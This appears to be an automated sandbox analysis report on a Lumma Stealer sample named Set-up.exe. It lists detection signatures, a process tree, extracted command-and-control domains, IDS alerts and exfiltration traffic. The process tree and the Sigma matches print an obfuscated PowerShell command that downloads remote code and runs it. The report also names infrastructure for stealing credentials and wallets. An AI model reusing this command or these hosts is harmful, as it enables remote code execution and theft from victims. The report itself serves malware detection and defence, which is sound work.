Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1584522
MD5: 956e50e278acbf39dfca43e8ba78f112
SHA1: 50d818804b27bfa3ad79a469f0f93d08e3d09b9c
SHA256: caa52bf06d55953df9dba864dcc718170f4598e217e6f949c909d59b19d74a02
Tags: exe, LummaStealer, user-aachum
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Set-up.exe (PID: 3492 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 956E50E278ACBF39DFCA43E8BA78F112)
    • powershell.exe (PID: 6736 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PU6S498VOPMOZVY2Y7.exe (PID: 2000 cmdline: "C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
      • PU6S498VOPMOZVY2Y7.tmp (PID: 4820 cmdline: "C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$2042C,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
        • PU6S498VOPMOZVY2Y7.exe (PID: 2708 cmdline: "C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • PU6S498VOPMOZVY2Y7.tmp (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$60272,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
            • timeout.exe (PID: 5740 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 5236 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6180 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 6188 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 6400 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5928 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 2640 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 4544 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2124 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3492 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3520 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2000 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5076 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3848 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 1440 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 428 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5368 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 3588 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 944 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • BrightLib.exe (PID: 5796 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["cloudewahsj.shop", "abruptyopsn.shop", "nearycrepso.shop", "framekgirus.shop", "noisycuttej.shop", "cellardesiresso.sbs", "wholersorie.shop", "rabidcowse.shop", "tirepublicerj.shop"], "Build id": "Ed5Bn--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x53f45:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Set-up.exe PID: 3492 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: Set-up.exe PID: 3492 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Set-up.exe PID: 3492 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

              System Summary

Source: Process started (six Sigma matches on the same process-creation event)
Rule authors, one entry per match:
  • Florian Roth (Nextron Systems)
  • Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
  • frack113
  • Florian Roth (Nextron Systems)
  • James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
  • Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data (identical for all six matches):
  Command / CommandLine / ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a
  CommandLine|base64offset|contains: ^
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe"
  ParentImage: C:\Users\user\Desktop\Set-up.exe
  ParentProcessId: 3492
  ParentProcessName: Set-up.exe
  ProcessId: 6736
  ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-05T18:53:16.329003+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:17.374948+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:18.515960+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:20.066657+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49751 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:21.303531+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:23.459991+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:24.497114+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:25.568733+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:26.900823+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49757 | 185.161.251.21 | 443 | TCP
2025-01-05T18:53:27.654581+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49758 | 172.67.208.58 | 443 | TCP
2025-01-05T18:53:16.883420+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:17.922014+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:26.151646+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:16.883420+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:17.922014+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 104.21.87.8 | 443 | TCP
2025-01-05T18:53:28.054025+0100 | 2008438 | 1 | A Network Trojan was detected | 172.67.208.58 | 443 | 192.168.2.4 | 49758 | TCP
2025-01-05T18:53:25.062321+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 104.21.87.8 | 443 | TCP

              AV Detection

Source: https://cegu.shop/8574262446/ph.txts | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txts; | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txt8 | Avira URL Cloud: Label: malware
Source: https://dfgh.online/invoker.php?compName=hZ | Avira URL Cloud: Label: malware
Source: Set-up.exe.3492.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["cloudewahsj.shop", "abruptyopsn.shop", "nearycrepso.shop", "framekgirus.shop", "noisycuttej.shop", "cellardesiresso.sbs", "wholersorie.shop", "rabidcowse.shop", "tirepublicerj.shop"], "Build id": "Ed5Bn--"}
Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe | ReversingLabs: Detection: 73%
Source: Set-up.exe | ReversingLabs: Detection: 18%
Source: Set-up.exe | Virustotal: Detection: 17%
Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp | String decryptor output, one string per entry:
  • cloudewahsj.shop
  • rabidcowse.shop
  • noisycuttej.shop
  • tirepublicerj.shop
  • framekgirus.shop
  • wholersorie.shop
  • abruptyopsn.shop
  • nearycrepso.shop
  • cellardesiresso.sbs
  • lid=%s&j=%s&ver=4.0
  • TeslaBrowser/5.5
  • - Screen Resoluton:
  • - Physical Installed Memory:
  • Workgroup: -
  • hRjzG3--JENYA
Source: Set-up.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49758 version: TLS 1.2
              Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000024.00000002.2524141455.00000000382E6000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2524283597.0000000038640000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000024.00000002.2524141455.00000000382E6000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2524283597.0000000038640000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0B07DD58h]0_2_0223DE00
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [edx], bl0_2_0221FEE2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [edx], bl0_2_0221FEE2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_02218F18
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]0_2_02218F18
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, word ptr [ecx]0_2_02226F78
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 6A911B6Ch0_2_02228C04
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0222FC18
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_0222FC18
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [edx], bl0_2_0221ACA8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [edx+esi], 0000h0_2_02233CF8
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then test esi, esi0_2_02250D78
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp al, 2Eh0_2_0223BDB7

              Networking

              Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49755 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49756 -> 104.21.87.8:443
              Source: Joe Sandbox View | IP Address: 185.161.251.21
              Source: Joe Sandbox View | IP Address: 172.67.208.58
              Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
              Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 172.67.208.58:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 104.21.87.8:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 185.161.251.21:443
              Source: Network traffic | Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.208.58:443 -> 192.168.2.4:49758
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: cellardesiresso.sbs
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 79 | Host: cellardesiresso.sbs
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=9JRIGM89O7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18115 | Host: cellardesiresso.sbs
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=4LOL4O0HVV003F1EU | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8778 | Host: cellardesiresso.sbs
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=1CTPDNSQLA59CQLB | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20425 | Host: cellardesiresso.sbs
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=1I1ML2QD2 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 944 | Host: cellardesiresso.sbs
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=61SO7GFGNS | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1054 | Host: cellardesiresso.sbs
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 114 | Host: cellardesiresso.sbs
              Source: global traffic | HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
              Source: global traffic | HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: klipvumisui.shop
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | DNS traffic detected: DNS query: cellardesiresso.sbs
              Source: global traffic | DNS traffic detected: DNS query: cegu.shop
              Source: global traffic | DNS traffic detected: DNS query: klipvumisui.shop
              Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: cellardesiresso.sbs
              Source: Set-up.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: powershell.exe, 00000002.00000002.1902724955.00000000006FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: powershell.exe, 00000002.00000002.1903649032.0000000004BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=hZ
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://jrsoftware.org/
              Source: Set-up.exe, 00000000.00000003.1912566496.000000000391C000.00000004.00000800.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe, 00000006.00000000.1974262864.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://jrsoftware.org0
              Source: Set-up.exe, 00000000.00000002.1976966783.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1967884896.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
